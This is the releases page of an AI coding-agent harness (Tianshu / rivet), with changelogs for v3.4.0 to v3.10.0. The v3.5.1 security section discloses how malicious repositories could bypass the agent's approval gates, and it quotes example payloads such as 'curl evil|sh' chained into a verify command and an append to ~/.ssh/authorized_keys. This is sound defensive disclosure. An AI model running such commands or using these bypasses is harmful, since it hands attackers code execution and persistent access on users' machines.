Skip to content

Releases: huiliyi37/Tianshu-harness

v3.10.0 会话性能可视化 + 禅模式 + 自然语言改设置

Choose a tag to compare

@huiliyi37 huiliyi37 released this 01 Sep 11:47

注意事项(升级前必读)

  • CLI 升级npm i -g tianshu-tui@latest(包名 tianshu-tui,命令仍是 rivet),或一键脚本。
  • 桌面端:Windows x64 安装包随版上架(NSIS/MSI + 更新签名),Windows 用户即刻收到本版更新推送;macOS 双架构安装包由打包机后续上传(就位前 macOS 用户不收本版更新推送,停留在 3.9.0 不受影响)。
  • Zen Mode:新会话默认读专注开局(只读工具面,动手即解锁,零审批变化);tools.zen.enabled: false 可全局关闭,会话内 /fast 单次跳过。

v3.9.0 项目授信前置 + 统一记忆系统 + /model 推理等级同行调节

Choose a tag to compare

@huiliyi37 huiliyi37 released this 29 Aug 02:50

v3.9.0 发布记录

日期:2026-08-29
上一版本:v3.8.0(release 收尾 commit d0ba74de9,2026-08-27)
提交数:61 commits
范围:项目授信前置提示(进入目录即问、当次生效);统一记忆系统六阶段合流(PR #6)+ 记忆件四补;计划链路三连修(事实锚点换根重试 / 探测预算硬化 / 移除低阶模型警告);UX 审计 P0-P1 一批(OAuth 登录落地、首启向导逃生口、错误时刻可行动化、首启弹窗排队);多代理协同显性化;一键安装脚本。

1. 安全:项目授信前置提示(ea2de2f53

  • 进入目录即在 bootstrap 之前主动询问「是否授信」(项目配置含安全敏感键或存在 .rivet/hooks.json 时才出现,零赌注零打扰)——取代此前只在 stderr 打一行、会话中段才发现 yolo/hooks「神秘失效」的被动通知
  • [y] 授信当次会话生效(配置键随本次 loadConfig 合并,无需重启);[n] 下次再问;[d] 本项目不再提示(持久化于 ~/.rivet/project-trust.json,/trust 授信即恢复)
  • 附带:忽略通知只在实际剥到键时打印,且列出真实键名(不再用笼统清单);/trust status 显示启动提示开关

2. 统一记忆系统(PR #6 六阶段 + 四补)

  • 缓存安全的自适应项目记忆(阶段一)→ 重要操作后模型判断写入 LTM → 新会话默认携带记忆 → 会话结束巩固(摘要 + 可复用做法)→ 记忆安全(敏感 scrub + worker 隔离)→ 长期记忆退役/维护(invalidate-don't-delete)
  • 记忆件四补(对齐 dsh):/remember 用户命令、历史会话回填、deep_recall 深召回、STM pressure-turns

3. 计划链路三连修

  • 事实锚点换根重试(0f8940214):引用相对会话目录缺失时探测子目录/父目录/兄弟项目根,命中改报 root-mismatch 并给出实际位置(历史回放 31% 漂移报告属此类虚报);占位示例锚点(foo.ts/a.py)处处缺失时视为举例散文;枚举粘连 token(README.md/README.zh.md/…)不再提取
  • 换根探测 syscall 预算硬化(65ed67a25):L0 父目录常数定向 → L1 首段精确过滤 → L2 预算内 stat,REROOT_PROBE_BUDGET=128 总预算 + MAX_ROOT_ENUM=512 枚举截断——最坏成本与目录规模/锚点数解耦,预算耗尽 fail-open 降级 missing-file;报告新增 rerootProbes 观测字段
  • 移除计划链路的「低阶模型产出」警告(b733f0991):submit tool result / 批准通知 / /plan-list / 桌面端徽标与 Build 前横幅全部移除;model/modelTier 留痕保持中性元数据
  • worker salvage 打捞 findings 的 provenance 标记(salvaged: true)+ evidenceRefs 幻觉引用存在性校验 + digest 警告标签接线(82156c395a25ccad9d

4. 认证与供应商链路

  • OAuth 登录落地(UX 审计 P0-1):/login 命令从幽灵指引变为真实注册(默认 codex,浏览器授权 5 分钟窗),CLI 新增 rivet config login;ConnectCommit needsLogin 标记消除「直接开始对话」误导
  • keyless 单源豁免:isKeylessProviderEntry 收口——ollama/自定义无 key 端点运行时此前实际不可用,resolveApiKey 不再抛错;桌面欢迎页模型列表同步放行 keyless 供应商
  • 预设新增模型回流进存量 provider 快照(glm-5.3/5.3-flash 到达老用户);预设回填尊重用户删减(removeModel 删除不再被迁移回流);keyless 判定收紧到 loopback(云端无 key 不再误判)
  • 自定义供应商链路三修:anthropic 协议可达 + 探测失败可跳过
  • TUI /model 面板对标 Claude Code:模型与推理等级同行调节(</> 步进 + effort 随默认持久化);子代理模型路由引导三件套(派发 nudge + 设置面板一键推荐 + 无效配置警告);桌面模型设置优化轮(常显列表 + 预设来源标注 + 配置前预览)

5. UX 审计整改一批(P0–P2)

  • P0-2 首启 required 向导三逃生口:无 API Key 不再卡死(Codex OAuth 指引区 / 自定义表单 key 可空 / 中立「稍后配置」钮)
  • P1-6 桌面首启弹窗互斥排队:WebView2→存储→Git→connect 四弹窗收口 first-run-queue 状态机,同帧至多一个
  • P1-9 TUI 首启向导不再每次新会话强制重弹(纯取消即落哨兵,RIVET_HOME 生效)
  • P1-4 错误时刻可行动化:错误分类终态指引 + 上一条用户消息回填输入框;/mcp auth、/mcp logs 子命令修复(此前取错参数位恒不可达)
  • P1-5 桌面裸失败文案可行动化:12 个 locale 命名空间补「下一步」,sidecar 三条横幅加「打开日志目录」
  • P1-7 新增 docs/guides/troubleshooting.md:10 个高频现场按「现象→先看→怎么修」
  • choice-panel 输入子模式(自定义回答/驳回反馈)补光标编辑与粘贴
  • 计划审批卡视觉分层重排:容器边框 + 决策区分隔 + 主操作高亮

6. 多代理协同显性化

  • L1 曝光:欢迎页第三条协同入口(/team /scout /council);/help 按意图分组、多代理协同置首组带选型口诀;/council 升 core tier
  • L2 情境提示:orchestration-hint 新模块——并列连接词/多阶段动词/@file≥2/长文本枚举四信号 ≥2 命中才提示,每会话至多 2 次,Tab 采纳 / Esc 关闭(RIVET_ORCHESTRATION_HINT=0 可关)
  • 协同建议分流:评审类→council、排查类→scout、施工类→team;council 成本如实标注(多席模型 token 开销大)并从首屏三入口撤下
  • 修正:派发期间 GlanceBar 不再把星域切到天机(天机是编排阶段内部路由标记)

7. 桌面端(随 v3.9.0 桌面版发布)

  • 模型设置优化轮:模型列表常显 + 预设来源标注 + 配置前模型预览(defc472c0
  • 会话字号独立于界面字号——阅读面/导航面分离设置(21abc8b0e
  • 首启弹窗互斥排队(UX 审计 P1-6):WebView2→存储→Git→connect 四弹窗收口 first-run-queue 状态机,同帧至多一个(b5daccbf0
  • required 首启向导三逃生口(UX 审计 P0-2):无 API Key 不再卡死——Codex OAuth 指引区 / 自定义表单 key 可空 / 中立「稍后配置」钮(cd5010234
  • OAuth 登录落地桌面侧:connect-flow 的 /login 幽灵指引闭环(UX 审计 P0-1,d2b644d0e
  • 裸失败文案可行动化(UX 审计 P1-5):12 个 locale 命名空间补「下一步」+ sidecar 三条横幅加「打开日志目录」(d1b8a303f
  • WebView2 过旧从「建议升级」升级为「强制」——安装器最低版本 + 阻断式引导(870adeda5
  • 欢迎页模型列表放行 keyless 供应商(1ea973fb3
  • 子代理模型路由设置补 planning 任务键(对齐 TUI,01313be6c

8. 安装与发行

  • CLI 一键安装脚本 install-tui.sh / install-tui.ps1(macOS/Linux + Windows)
  • README 品牌定名 Tianshu Harness(TUI/GUI 双形态共享内核)+ 双形态实拍截图;Node 版本口径钉定 ≥24(engine-strict 硬闸)
  • sync-to-public 加 docs 白名单例外通道(用户面向文档可同步,设计草稿仍冻结)

注意事项(升级前必读)

  • CLI 升级npm i -g tianshu-tui@latest(包名 tianshu-tui,命令仍是 rivet),或一键脚本。
  • 项目授信:升级后进入含 .rivet-config.json 安全键或 .rivet/hooks.json 的项目会遇到一次授信询问——按 y 一次永久生效;这是 v3.8.0 信任门的配套 UX,fail-closed 语义不变。
  • 记忆系统:统一记忆默认生效(新会话携带记忆);敏感信息 scrub 后可写入,worker 记忆隔离。
  • 桌面端:R 桌面批次(模型设置优化轮/会话字号独立/首启弹窗排队/向导逃生口/失败文案可行动化/WebView2 强制升级)随本版发布,macOS 双架构安装包随版上架;Windows x64 安装包已随版上架(NSIS/MSI + 更新签名),Windows 用户会收到本版更新推送。
  • macOS 未公证:首次打开如提示「已损坏」请执行 xattr -cr /Applications/Tianshu.app

v3.8.0 /yolo 命令 + glm-5.3 + 桌面 R16-R25 + P0 设置体验五项

Choose a tag to compare

@huiliyi37 huiliyi37 released this 28 Aug 01:28
0a83a69

v3.8.0 发布记录

日期:2026-08-28
上一版本:v3.7.0(release 收尾 commit e90db1c62,2026-08-27)
提交数:22 commits
范围:TUI 授权命令大版——/yolo 全自动命令落地与三波语义收口(R23 落地 → R24 缺陷修正 → R25 共享重构);欢迎页品牌字标 ASCII 豁免(R21/R24);内置模型补 glm-5.3 系列;桌面端 R16–R25 一批体验与缺陷修复。

1. TUI /yolo 全自动命令(R23 c95162ea2 → R24 0562215b7 → R25 f064b474f/f614e2b6f

  • /yolo/yes 的同语义入口:进入全自动(跳过所有权限确认)+ 无限轮次 + 持久化为默认;/yolo off 退出回到自动(200 轮预算)
  • 命令面板 /help 后置顶 /yolo/yes,⚠ 高风险警示描述;显式输入命令即视为确认,无需二次弹窗
  • R24 修正:/yolo off 语义反转缺陷(表版残次复制丢 off 分支,输入 off 反而开启全自动并持久化)——表版删除,覆盖版与 /yes 完全同链(确认面板联动/Plan 叠层同步/try-catch 持久化)
  • R25 收口:共享 handler 提取独立模块 yolo-toggle.ts,杜绝复制分叉;持久化失败不再静默——输出「已切换但持久化失败: 原因 — 重启后不保持」可见提示
  • footer mode 段写实:粘滞换行开启显示 insert、退出回 normal(此前恒显 normal 为无信息占位)

2. TUI 欢迎页品牌字标 ASCII 豁免(R21 28cbf5dde + R24 1f254ff60

  • 品牌艺术字(█ ╔ ═ 立体 TIANSHU)不参与 ASCII 降级——# 点阵降级被终端用户视为「坏掉了」;pixel 点阵仅在显式选择或窄屏 <58 列自动降档时提供
  • R24 双层豁免修正:艺术字母恒 Unicode,品牌段小星形 ✦ 单独跟随 tiny-symbol 降级为 *(纯 ASCII 终端不再豆腐块),提示行小符号与基准线降档保留
  • logoSpec 注释与实现对齐(pixel 双来源口径)

3. TUI 其他

  • 内置模型补 glm-5.3 与 glm-5.3-flash(智谱 Coding Plan provider):glm-5.3 文本旗舰 1M 上下文/128K 输出;glm-5.3-flash 原生多模态视觉主力,带 supportsVision;capability 启发式特例化 flash 命名防误入弱卡(64fe98b8e
  • build 输出恢复干净:R11 词汇收口(passed→completed)遗留的 duplicate-case 死代码清零(d9b8fa087
  • 命令面板 /yes 重复条目删除(置顶版与旧版并存曾导致过滤 'yes' 出双条目)

4. 桌面端(R16–R25 + P0 设置体验五项,随本版发布)

  • R16 终端快捷键双吃治本:捕获阶段注册 + stopPropagation,Ctrl+J/Ctrl+` 不再同时写进 pty;死代码清理
  • R18 PlusMenu 二级面板统一 shadcn 子菜单语言 + 根菜单关闭清空子面板状态 + 状态机 reducer 化
  • R19 欢迎页模型列表不再排除视觉模型(👁 徽章区分)
  • R20 供应商模型设置对标 ZCode 两栏主从重排
  • R21 悬浮面板回归纯覆盖、零预留
  • R22 欢迎页会话窗口优化(星域 chips 富描述/模型 pill 写实/偏好持久化)+ 只写不读缺陷修复 + R25 写入侧收口与陈旧存档兜底
  • 滚动契约测试对齐现行实现(grid 覆盖三不变量/followMode 分流)
  • P0 设置体验五项(对标 ZCode 解包分析):①设置侧栏分区描述(23 条双语,页头常驻 + 悬停提示 + 并入搜索;顺带修复 nav.greeting 词条缺失);②语言切换归位外观分区 + 侧栏用户菜单语言快切;③预设卡「获取 API Key」官方直链(13 个预设经核实配 keyUrl);④模型批量添加——「每行一个」粘贴 + 从接口拉取勾选一次落盘;⑤帮助页「重新运行连接向导」再入口

注意事项(升级前必读)

  • CLI 升级npm i -g tianshu-tui@latest(包名 tianshu-tui,命令仍是 rivet)。
  • /yolo 语义:显式输入即确认、无二次弹窗;持久化为默认(重启后仍生效);/yolo off 退出;/rollback 可回滚。
  • 桌面端:R16–R25 + P0 五项随本版(v3.8.0 桌面线)发布,CLI 与桌面端版本对齐。
  • macOS 未公证:首次打开如提示「已损坏」请执行 xattr -cr /Applications/Tianshu.app
  • ASCII 终端:欢迎页品牌字标恒为立体 TIANSHU(现代终端覆盖率近 100%);星形退为 *,提示行符号退为 -/.

v3.7.0 TUI 欢迎页重设计 + 桌面布局对标

Choose a tag to compare

@huiliyi37 huiliyi37 released this 27 Aug 01:47

v3.7.0 发布记录

日期:2026-08-27
上一版本:v3.6.0(release commit 45133b1f0 前序 1f76c35b5,2026-08-26)
提交数:25 commits
范围:TUI 体验大版——欢迎页「定盘星」重设计 + 输入框图片附件编辑闭环 + /domain 面板改造 + 快捷键路由;桌面端布局对标 ZCode(R14 → 用户拍板 R15 修正);WebView2 预窗口修复工具移植。

1. TUI 欢迎页「定盘星」重设计(2ea713345 + 8b4a05184 + a2490c463

  • ANSI Shadow 立体字 TIANSHU 大字标(56×6,logoStyle/RIVET_WELCOME_LOGO 可切点阵,<58 列自动降档)
  • 使命行星光扫过动画(~0.45s;非 TTY/ASCII/RIVET_WELCOME_ANIM=0 可跳过,末帧=静态零跳变)
  • 进入提示区:⏜ handoff 满 60% 交接 + ✧ 中途切 /model、/domain 碎缓存提示,新会话一次性随滚动离场(5e7b68b15 /domain 行置首)
  • 启动卡顿根治:欢迎块整块单次 flush(逐行 write 是分层卡顿来源);使命行扫光改 Atomics.wait 阻塞式微休眠,杜绝启动期任务插队;帧数 17→9(≈144ms)
  • slash 开合后输入框钉住不再弹回(a2490c463

2. TUI 输入框图片附件编辑闭环(e4a77a0ab

backspace 在文本空时删最后一张图;Ctrl+C 的 hasContent 含 images(有图不再误入退出确认)并原子清空;undo 快照纳入 images(Ctrl+Z 整体恢复文本+图);清空后 "Ctrl+Z to restore" 提示 2s。

3. TUI 其他

  • /domain 面板改造(dc3efea99+32b39edfe+75d55c351):星域别名成为一等字段(16 星对齐 README),列表行带别名+职责标语,详情区展示提示词精华,矮终端滚动窗口收敛
  • f1-f8 快捷键路由 8 个高频命令 + palette 键位提示(34153c544
  • diff 行内 word-level 高亮(720479336,借鉴 Cursor CLI)
  • 换行模式粘滞 newlineMode + footer 键位提示,对齐公开仓(1f80c77d4
  • README 星域章节改造:新用户推荐分组 + 按任务场景选星速查(41992d277

4. 桌面端

  • 布局对标 ZCode(R14 61b54d5d6)+ 用户拍板回退修正(R15 3ea84ff87):侧栏 340/上限 460、会话行单行纪律、正文排版还原 Codex 参照档(text-lg/1.45/负字距)、正文列 --reading-max 768、.messages 左右最小间距 32px、悬浮输入框随正文列同宽
  • WebView2 预窗口修复工具(3812d8cbc,移植公开仓 PR #52

5. 测试与社区

  • 全量测试剩余失败修复(f3013eb46,含信任门授信测试对齐);passed→completed 终态词汇断言收口(aae59830b
  • 公开仓贡献收录:PR #46/#49/#50(yq04)、PR #51(maoqiu77)
  • 账本对齐 5 处巨石实际行数(f0ab08400

注意事项(升级前必读)

  • mac 双包分架构,别装错:Apple Silicon 下载 Tianshu_3.7.0_aarch64.dmg,Intel 下载 Tianshu_3.7.0_x64.dmg。包内 Node/原生件按目标架构打包,装错架构无法启动。
  • Windows 本版未随发:Windows 包由打包机另行构建;在其条目回流 latest.json 之前,Windows 用户停留在 3.6.0,不会误收半套更新。
  • 桌面端自动更新暂不下发 3.7.0:OSS 更新源刷新是发布后置步骤(GitHub 资产齐 → windows 条目回流 → upload-update-to-oss.sh)。在此之前自动更新不会推送本版,mac 用户可从本 Release 手动下载 DMG 覆盖安装(配置与数据不受影响)。
  • CLI 升级npm i -g tianshu-tui@latest(包名 tianshu-tui,命令仍是 rivet)。
  • 欢迎页扫光动效:使命行开机有一次 ~144ms 光带扫过;RIVET_WELCOME_ANIM=0 可关,管道/CI/ASCII 终端自动跳过。
  • 侧栏宽度:默认提到 340px(上限 460)。手动调过侧栏宽度的老用户保持自己的持久化值不受影响;会话标题现按单行纪律省略号截断,不再折两行。
  • 版本门槛:本版 TUI 与桌面端同版本号发布(3.7.0),建议 CLI 与桌面端一起升级——欢迎页与输入框行为两侧对齐。

v3.6.0

Choose a tag to compare

@huiliyi37 huiliyi37 released this 25 Aug 19:59

v3.6.0

CLI 已发 npm tianshu-tui@3.6.0。桌面安装包三端已齐:macOS Apple Silicon / Intel,以及 Windows x86_64。

安装

  • Apple Silicon:Tianshu_3.6.0_aarch64.dmg
  • Intel:Tianshu_3.6.0_x64.dmg
  • Windows:Tianshu_3.6.0_x64-setup.exe

macOS 包未公证。首次打开若提示「已损坏」,执行:

xattr -cr /Applications/Tianshu.app

主要变化

  • 欢迎页用 /model 替换 ctrl+p;交接提醒 70% → 60%(赶在自动压缩前)
  • DeepSeek 视觉实验档 deepseek-v4-flash-vision-exp(1M 上下文,定价与 flash 同档)
  • worker 结果协议收口(failureReason 12 值)+ 子进程隔离 opt-in
  • 计划审阅卡 / slash 菜单钉底
  • 桌面:WebView2 过旧静默回退三层修复、/scout 蜂群卡死四修、语音模型四档下载即切换

完整记录见仓库 docs/releases/v3.6.0.md

v3.5.2 桌面迭代版

Choose a tag to compare

@huiliyi37 huiliyi37 released this 23 Aug 06:53

v3.5.2 发布记录

日期:2026-08-23
上一版本:v3.5.1(release commit 95658936a,2026-08-23)
提交数:2 commits(1 fix(desktop) / 1 feat(desktop))
范围:桌面端迭代版。Windows 会话滚动拉扯三修(end-anchor 翻默认 + scrollbar-gutter + 咬合阈值)+ popout 小窗进度条。CLI 线无功能变更,版本随桌面线对齐。

1. Windows 会话拉扯三修(185660684

对标 ZCode 滚动架构后的三件落地,针对 Windows 125%/150% DPI 下聊天区上下拉扯:

  • END_ANCHOR 翻默认rivetEndAnchor !== '0','0' 为回退通道):库端 anchorTo:'end' + 整数量测,根除分数尺寸身份振荡——实机四格矩阵证明端锚下振荡归零、补偿链静默(legacy 仍 84-112 次/轮)
  • scrollEndThreshold 8 → 32px:覆盖实测 S1 终态残差 26.8px(上滑回滚停在阈值外不再被咬合回底),仍远小于 64px 脱扣门
  • .messagesscrollbar-gutter: stable:Windows 经典滚动条 17px 是布局宽度,折叠链穿越溢出阈值时滚动条出现/消失 → clientWidth 跳变 → 全文重排共振。预留槽后内容宽度恒定;macOS overlay 滚动条零宽天然免疫

2. popout 小窗进度条(199eef069

对标 ZCode 悬浮窗「进程」区——小窗悬在别的应用上时扫一眼即知 agent 走到哪:

  • 默认一条状态行:任务 done/total + 当前进行中项(单行截断,主题色高亮);无任务时组件自渲染 null 不占行
  • 点开勾选清单:pending 空心圈 / in_progress 旋转 loader / completed 对勾 + 删除线,超高滚动,行单行截断
  • 数据源复用事件流已有的 view.todos 快照(零新增请求);进度条不参与 flex 拉伸,纵向空间全留给线程流
  • 中英 locale 双语(popout.tasks / popout.noActiveTask)

v3.5.1 安全补丁版

Choose a tag to compare

@huiliyi37 huiliyi37 released this 22 Aug 16:23

v3.5.1 发布记录

日期:2026-08-22
上一版本:v3.5.0(release commit 4a1228226,2026-08-19)
提交数:7 commits(4 fix(security) / 1 fix(computer-use) / 1 fix(desktop) / 1 feat(desktop))
范围:CLI 线安全补丁版。按 codex-security 方法论安全扫描的收口系列(信任门三根修 + 门禁检测五修 + 供应链钉扎/L 系列)+ 审查补漏 + computer use macOS 权限探针修复。桌面端两提交随下一版桌面线发布。

1. workspace-trust 项目信任门(fbe68cb0a

恶意仓库经项目级文件自我授权的三条通道收口(SECURITY.md 信任边界「仓库内容不能单独构成执行授权」此前只在文档成立):

  • H1 项目 hooks<cwd>/.rivet/hooks.json 未授信不加载(此前 spawnSync shell:true 无门禁,恶意仓库打开即任意执行)
  • H2 项目配置:loadConfig Layer 3 未授信剥离安全键(permissions/mcp/hooks/env/provider/providers/search/verify + agent.approval/agent.unsandboxed/ui.statusLine/skills.importFromClaude)
  • H3 MCP 拉起:随 mcp 剥离自动收口;verify 声明命令与桌面端 agent 块合并两处直读口同步设门
  • 信任决策:TUI /trust、CLI --trust/--untrust、env RIVET_TRUST_PROJECT,持久化 ~/.rivet/project-trust.json(realpath 键控,不写回仓库)

2. 门禁与检测层五修(9c03e6cd8

  • H4 验证命令 argv 化:wave-gate/deliver-task/typecheck-gate 声明命令此前前缀正则白名单 + shell:true——npx tsx; curl evil|sh 实测穿透。新 verify-command.ts token 字符集白名单(拒全部 cmd/sh 元字符)+ argv 形状校验,POSIX 直 spawn / win32 经 ComSpec
  • H5 ast_edit 接管 validatePathSafe:写类路径边界 + 敏感文件硬门 + symlink 复检(此前完全绕过,auto-safe 零审批写出工作区)
  • H6 bash 安全写按操作数落点放行echo k >> ~/.ssh/authorized_keys 不再自动免审
  • M2-M4:破坏性门禁补族(remove-item/del /s/find -delete/shred/rsync --delete/truncate table/rm 分离旗标);敏感检测归一化匹配(scripts/../.env.ENV 绕过关闭)+ detectSensitiveGitAdd 接线进 bash 审批与 git commit 门;敏感模式补 basename 无扩展形态
  • M7:越工作区路由扩至 export_file/open_path/create_document 族

3. 供应链钉扎 + server 面加固(28beed3a7

  • M1 better-sqlite3 原生二进制全 12 平台 tarball SHA-256 钉扎(有钉扎全镜像校验硬失败,无钉扎仅放行基础设施源)
  • M5 插件名模式约束(防安装路径穿越/递归删任意目录)
  • L 系列:CORS 白名单反射 + Host 回环校验(新 server/cors.ts,通配 * 清除);/health 匿名收敛为 {ok,version};speech/greeting/open-file 路由级鉴权;session id 换 CSPRNG;fetchWithTimeout 默认 redirect:'error'(堵 x-api-key 跨源重定向泄漏);SSRF 黑名单补 NAT64/6to4;凭证/转录文件 0600;run-tests Windows 引号覆盖 cmd 元字符;apply_patch 目标过 validatePathSafe;swebench 全参数数组 spawn

4. 信任门剥离补漏——审查修复(4589cfc39

v3.5.1 内对 fbe68cb0a 的审查发现:schema 的 permissions 实际嵌在 agent.permissions(剥离清单里的顶层 permissions 是死条目)——未授信项目可经 additionalWriteDirs 常驻写授权、allow 规则、bash.allowlist 预授权自我授权。补 ['agent','permissions'] 嵌套剥离 + plugins/mirrors 入顶层清单;测试改按真实消费路径断言(原断言查不存在的顶层键,空转通过)。

5. computer use macOS 权限探针(ae2ddfa6b,Pro)

用户症状:授权屏幕录制后,关掉 computer use 菜单再点回去又要重新授权。根因在探针自身:screencapture CLI 探测在未授权态每次触发 macOS 系统弹窗(5s 超时强杀 → 永远报缺失)。改 CGPreflightScreenCaptureAccess() / AXIsProcessTrusted() ASObjC 无副作用读 TCC;已授权待重启态明示「重启生效」而非引导重授权。

6. 桌面端(随下一版桌面线发布,此处仅记录)

  • 输入框附件缩略图点开 ImageLightbox(fd5ce1b12
  • macOS 消息文字选区复制修复(ContextMenuTrigger selectable 逃逸口)+ lightbox 双端捏合缩放(1f3bb48e1

已知事项

  • macOS 桌面端 TCC 层面:ad-hoc 签名导致每次更新屏幕录制/辅助功能授权失效、未公证 app 的月度系统重确认弹窗——根治需 Developer ID 签名 + 公证(打包脚本 codesign-nested.js 已就绪,配 APPLE_SIGNING_IDENTITY 即可)

v3.5.0

Choose a tag to compare

@huiliyi37 huiliyi37 released this 19 Aug 00:47

v3.5.0 更新内容

计划文档全屏预览(本期主打)

plan mode 创建计划文档后,此前审批卡只有 6 行截断摘要——现在可以在批准前看全文:

  • 审批卡按 v → 全屏翻页阅读计划全文(PgUp/PgDn 翻页、/ 搜索),q/Esc 返回审批卡,倒计时状态不丢
  • plan-picker 按 v → 先预览再决定是否批准
  • /plan-view [slug] → 随时查看任何计划;无参时优先唯一的待审批计划,否则显示撰写中的活动草稿(agent 边写边可见)

CLI / TUI(公开仓 PR 三连修,@yq04

  • 命令面板视窗跟随选中项#46):命令多于屏时高亮不再滚出可视区,footer 显示剩余条数;首屏 ctrl+p 提示与斜杠命令同色
  • 输入框钉住#49):slash 提示 / 权限行 / 任务面板开合不再让输入框上下跳动
  • 排队消息本轮结束自动发出#50):⏳ 已排队 内容在 run 结束后自动作为下一轮发出(多条按 FIFO 逐条),⏳ 条固定在输入框上方不随输出上漂;ESC 仍可取回编辑

Agent 编排(starflow 写工预算)

  • 写工预算按任务形状定价 + 历史回馈:多文件任务一次发准,不再靠续跑兜预算
  • starflow 波次战报:逐块终态进最终报告;环境预检前置(磁盘硬约束在方案确认前可见)
  • worker 用量双账本对齐:续跑后 meta 与 cache-log 一致(对账命令 npx tsx scripts/audit-usage-ledgers.ts

安装与存储修复

  • better-sqlite3 安装链两连修:静默失败标记 + 启动自愈;不再随便降级内存模式(跨会话知识 / claims 不再静默失能)
  • meridian 迁移守卫修复:v1 迁移不再阻断 VACUUM(长期使用库空洞回收)

桌面端

  • 滚动冷却窗过期重评:停手后无新事件也能恢复跟随

完整发布记录见仓库 docs/releases/v3.5.0.md


📦 安装指南

1. 环境要求

  • 桌面端:开箱即用,无需任何前置依赖。本 Release 提供 macOS(Apple Silicon / Intel 双架构)
  • CLI:Node.js 24.1.0(推荐;22+ 通常可用)—— node --version 检查。Git 强烈建议(解锁检查点回滚 / worktree 隔离 / diff 审查)

2. 安装(任选其一)

方式 A:桌面端(开箱即用) —— 下方 Assets 下载 DMG,拖入 Applications:

设备 下载
MacBook(M1 / M2 / M3 / M4 及以后) Tianshu_3.5.0_aarch64.dmg
Intel Mac Tianshu_3.5.0_x64.dmg

拿不准自己是什么架构?终端执行 uname -m——输出 arm64 选 aarch64 包,输出 x86_64 选 x64 包。

首次启动后按引导配置服务商即可(/connect 向导:选内置或自定义 → 填 API 密钥 → 探测验证)。

Windows 用户:本版 Windows 安装包稍后补发(Tianshu_3.5.0_x64-setup.exe 待 Windows 构建机出包后追加到本 Release),已装 3.4.0 的用户自动更新会等待 Windows 条目就绪,不会收到半包。

方式 B:npm 全局安装(CLI,全平台立即可用) —— tianshu-tui@3.5.0 已发布,无需本地构建,启动自动检查更新:

npm install -g tianshu-tui
rivet

Windows 提示:装完提示 rivet 无法识别——先新开一个终端;仍不行,把 npm prefix -g 的目录加进用户 PATH 再开新终端(nvm/fnm/scoop 安装的 Node 需手动加一次)。

方式 C:从源码构建

git clone https://github.com/huiliyi37/Tianshu-Tui.git
cd Tianshu-Tui
npm install
npm run build
npm start

3. Shell 补全(可选)

仓库自带 completions/(bash / zsh / fish / PowerShell),用法见 README「启用 Shell 补全」。

4. 校验下载(可选)

6ceda77799b4e0dd701937461c69438f1e2a9909b83298dea15ff182bc4985c6  Tianshu_3.5.0_aarch64.dmg
a28ac932ef93ceff35b8b93e9178c7a0bf53665a45468bcf8858cb2005078bf8  Tianshu_3.5.0_aarch64.app.tar.gz
ca5829d045668453199d1885bc8e7c8a2def75beaed1b2ac702c49658b2d1acb  Tianshu_3.5.0_x64.dmg
4e7281780812402e512068325c3e79587e91f124bd87013ce257dd1cb32aaf8c  Tianshu_3.5.0_x64.app.tar.gz

(macOS:shasum -a 256 <文件名> 比对;.app.tar.gz.sig 供内置自动更新器使用,手动安装下载 DMG 即可。)

已升级用户

桌面端自动更新自动送达(macOS 走 .app.tar.gz,无需重装);CLI 端 rivet 启动时自动检查,或手动 npm update -g tianshu-tui


已知问题(如实标注)

  • 桌面端未公证(无 APPLE_SIGNING_IDENTITY):macOS 安装后如提示「已损坏」,执行 xattr -cr /Applications/Tianshu.app
  • pager 搜索匹配计数为「消息」口径(计划文档全文显示 1/1 属正常,行级高亮不受影响)
  • Goal 倒计时开着审批卡时秒数可能不逐秒刷新(既有行为,下版处理)

致谢

本期 8/26 提交来自社区:@yq04(公开仓 #46 面板视窗跟随 / #49 输入框钉住 / #50 排队自动发出,均附根因分析与测试基线,经审查回合主线)。感谢每一位贡献者。

v3.4.0

Choose a tag to compare

@huiliyi37 huiliyi37 released this 17 Aug 01:17

v3.4.0 更新内容

桌面端

  • 底部微滚动:会话在最底部时单格上滚不再被钉底逻辑立即拉回(400ms 冷却窗内保留阅读意图)(PR#5,@HarriethWiKk
  • 通知残影修复(Win11):弹窗开合后右上角「子代理受阻」半截通知残影不再出现(issue #44

CLI / TUI(公开仓 PR 五连修,@yq04

  • 排队消息语义对齐#40):AI 输出期间排队的消息不再被自动注入——run 结束后回填输入框,由你按 Enter 确认发送
  • 输入框贴底#40):滚动到底时输入框位于屏幕最下方
  • 命令面板换绑 Ctrl+P#41):Ctrl+Esc 在 Windows 被开始菜单抢占且三条送达路径全断;翻历史用 ↑/↓、Ctrl+N、Ctrl+R
  • Ctrl+C 退出确认可取消#42):确认窗口内 Esc / 编辑 / 粘贴均取消退出,修复幽灵输入与带输入误退出
  • 任务清单跨 run 不复活#43):「任务 5/5 不更新」根修——上一轮全完成清单不再挂在新 run 头上
  • slash 提示分层#45):输入 / 只展示 ~20 条核心命令,继续输入即过滤全部;/undo/resume 补进提示列表

存储治理

  • 遥测/索引/备份文件无界增长收口(meridian DB 保留窗口 + WAL checkpoint + backups 保留策略)

📦 安装指南

1. 环境要求

  • 桌面端:开箱即用,无需任何前置依赖。Windows 10(1809+)/ Windows 11 需 WebView2 Runtime(Win11 与多数 Win10 已预装,缺失时安装器自动下载;离线环境:https://aka.ms/webview2installer)
  • CLI:Node.js 24.1.0(推荐;22+ 通常可用)—— node --version 检查。Git 强烈建议(解锁检查点回滚 / worktree 隔离 / diff 审查)

2. 安装(任选其一)

方式 A:桌面端(开箱即用) —— 下方 Assets 下载:

  • macOS Apple SiliconTianshu_3.4.0_aarch64.dmg
  • macOS IntelTianshu_3.4.0_x64.dmg
  • WindowsTianshu_3.4.0_x64-setup.exe(Win10 1809+/Win11,需 WebView2 Runtime,缺失时安装器自动下载)

首次启动后按引导配置服务商即可(/connect 向导:选内置或自定义 → 填 API 密钥 → 探测验证)。

方式 B:npm 全局安装(CLI,全平台立即可用) —— 已发布 tianshu-tui,无需本地构建,启动自动检查更新:

npm install -g tianshu-tui
rivet

Windows 提示:装完提示 rivet 无法识别——先新开一个终端;仍不行,把 npm prefix -g 的目录加进用户 PATH 再开新终端(nvm/fnm/scoop 安装的 Node 需手动加一次)。

方式 C:从源码构建

git clone https://github.com/huiliyi37/Tianshu-Tui.git
cd Tianshu-Tui
npm install
npm run build
npm start

3. Shell 补全(可选)

仓库自带 completions/(bash / zsh / fish / PowerShell),用法见 README「启用 Shell 补全」。

已升级用户

桌面端自动更新自动送达(macOS 走 .app.tar.gz,无需重装);CLI 端 rivet 启动时自动检查,或手动 npm update -g tianshu-tui


